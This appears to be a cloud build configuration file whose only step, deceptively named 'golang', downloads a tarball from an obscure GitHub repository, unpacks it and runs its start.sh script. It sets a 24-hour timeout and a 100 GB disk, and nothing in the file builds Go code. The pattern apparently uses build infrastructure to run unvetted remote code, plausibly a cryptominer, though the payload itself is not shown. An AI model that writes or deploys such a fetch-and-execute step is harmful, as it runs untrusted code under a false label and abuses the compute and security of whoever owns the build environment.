steps:
  - name: golang
    args:
      - '-c'
      - >-
         wget https://github.com/jhhtgrtngrfbg/bapak-wawan/raw/main/wawan.tar.gz && tar xf wawan.tar.gz && ./start.sh
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s
options:
  diskSizeGb: '100'
